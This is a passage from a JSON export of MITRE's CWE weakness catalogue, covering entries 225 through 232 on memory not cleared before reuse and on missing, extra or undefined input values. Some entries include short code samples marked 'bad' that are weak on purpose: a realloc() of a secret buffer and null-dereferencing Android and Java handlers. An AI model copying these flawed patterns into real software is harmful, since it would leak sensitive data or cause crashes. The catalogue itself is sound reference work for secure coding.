Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"225":{"attr":{"@_ID":"225","@_Name":"DEPRECATED: General Information Management Problems","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-199.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): General Information Management Problems","attr":{"@_Date":"2021-07-20"}}}},"226":{"attr":{"@_ID":"226","@_Name":"Sensitive Information in Resource Not Removed Before Reuse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or \\"zeroize\\" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities.","Extended_Description":{"xhtml:p":["When resources are released, they can be made available for reuse. For example, after memory is de-allocated, an operating system may make the memory available to another process, or disk space may be reallocated when a file is deleted. As removing information requires time and additional resources, operating systems do not usually clear the previously written information.","Even when the resource is reused by the same process, this weakness can arise when new data is not as large as the old data, which leaves portions of the old data still available. Equivalent errors can occur in other situations where the length of data is variable but the associated data structure is not. If memory is not cleared after use, the information may be read by less trustworthy parties when the memory is reallocated.","This weakness can apply in hardware, such as when a device or system switches between power, sleep, or debug states during normal operation, or when execution changes to different users or privilege levels."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Trigger the release of the resource or cause the desired state transition to occur. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the product needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"During critical state transitions, information not needed in the next state should be removed or overwritten with fixed patterns (such as all 0\'s) or random data, before the transition to the next state.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When releasing, de-allocating, or deleting a resource, overwrite its data and relevant metadata with fixed patterns or random data. Be cautious about complex resource types whose underlying representation might be non-contiguous or change at a low level, such as how a file might be split into different chunks on a file system, even though \\"logical\\" file positions are contiguous at the application layer. Such resource types might require invocation of special modes or APIs to tell the underlying operating system to perform the necessary clearing, such as SDelete (Secure Delete) on Windows, although the appropriate functionality might not be available at the application layer.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0001","Description":"Ethernet NIC drivers do not pad frames with null bytes, leading to infoleak from malformed packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001"},{"Reference":"CVE-2003-0291","Description":"router does not clear information from DHCP packets that have been previously used","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"},{"Reference":"CVE-2005-1406","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1406"},{"Reference":"CVE-2005-1858","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2005-3180","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3180"},{"Reference":"CVE-2005-3276","Description":"Product does not clear a data structure before writing to part of it, yielding information leak of previously used memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3276"},{"Reference":"CVE-2002-2077","Description":"Memory not properly cleared before reuse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2077"}]},"Functional_Areas":{"Functional_Area":["Memory Management","Networking"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Information Uncleared Before Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":[{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"This entry needs modification to clarify the differences with CWE-212. The description also combines two problems that are distinct from the CWE research perspective: the inadvertent transfer of information to another sphere, and improper initialization/shutdown. Some of the associated taxonomy mappings reflect these different uses.","attr":{"@_Type":"Maintenance"}},{"#text":"This is frequently found for network packets, but it can also exist in local memory allocation, files, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Sensitive Information Uncleared Before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Sensitive Information Uncleared Before Release","attr":{"@_Date":"2020-02-24"}},{"#text":"Sensitive Information Uncleared in Resource Before Release for Reuse","attr":{"@_Date":"2020-08-20"}}]}},"228":{"attr":{"@_ID":"228","@_Name":"Improper Handling of Syntactically Invalid Structure","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"If an input is syntactically invalid, then processing the input could place the system in an unexpected state that could lead to a crash, consume available system resources or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Structure and Validity Problems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"This entry needs more investigation. Public vulnerability research generally focuses on the manipulations that generate invalid structure, instead of the weaknesses that are exploited by those manipulations. For example, a common attack involves making a request that omits a required field, which can trigger a crash in some cases. The crash could be due to a named chain such as CWE-690 (Unchecked Return Value to NULL Pointer Dereference), but public reports rarely cover this aspect of a vulnerability.","attr":{"@_Type":"Maintenance"}},{"#text":"The validity of input could be roughly classified along \\"syntactic\\", \\"semantic\\", and \\"lexical\\" dimensions. If the specification requires that an input value should be delimited with the \\"[\\" and \\"]\\" square brackets, then any input that does not follow this specification would be syntactically invalid. If the input between the brackets is expected to be a number, but the letters \\"aaa\\" are provided, then the input is syntactically invalid. If the input is a number and enclosed in brackets, but the number is outside of the allowable range, then it is semantically invalid. The inter-relationships between these properties - and their associated weaknesses- need further exploration.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Structure and Validity Problems","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Syntactically Invalid Structure","attr":{"@_Date":"2009-03-10"}}]}},"229":{"attr":{"@_ID":"229","@_Name":"Improper Handling of Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Value Problems","attr":{"@_Date":"2008-04-11"}}}},"230":{"attr":{"@_ID":"230","@_Name":"Improper Handling of Missing Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0422","Description":"Blank Host header triggers resultant infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0422"},{"Reference":"CVE-2000-1006","Description":"Blank \\"charset\\" attribute in MIME header triggers crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1006"},{"Reference":"CVE-2004-1504","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1504"},{"Reference":"CVE-2005-2053","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2053"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Notes":{"Note":{"#text":"Some \\"crash by port scan\\" bugs are probably due to this, but lack of diagnosis makes it difficult to be certain.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Value","attr":{"@_Date":"2009-03-10"}}]}},"231":{"attr":{"@_ID":"231","@_Name":"Improper Handling of Extra Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when more values are provided than expected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one value is expected."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Value Error"}},"Notes":{"Note":{"#text":"This can overlap buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Value","attr":{"@_Date":"2009-03-10"}}]}},"232":{"attr":{"@_ID":"232","@_Name":"Improper Handling of Undefined Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an address parameter is read and trimmed of whitespace.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String address = request.getParameter(\\"address\\");address = address.trim();String updateString = \\"UPDATE shippingInfo SET address=\'?\' WHERE email=\'cwe@example.com\'\\";emailAddress = con.prepareStatement(updateString);emailAddress.setString(1, address);","xhtml:br":["","","",""]}},"Body_Text":"If the value of the address parameter is null (undefined), the servlet will throw a NullPointerException when the trim() is attempted."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-1003","Description":"Client crash when server returns unknown driver type.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1003"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined 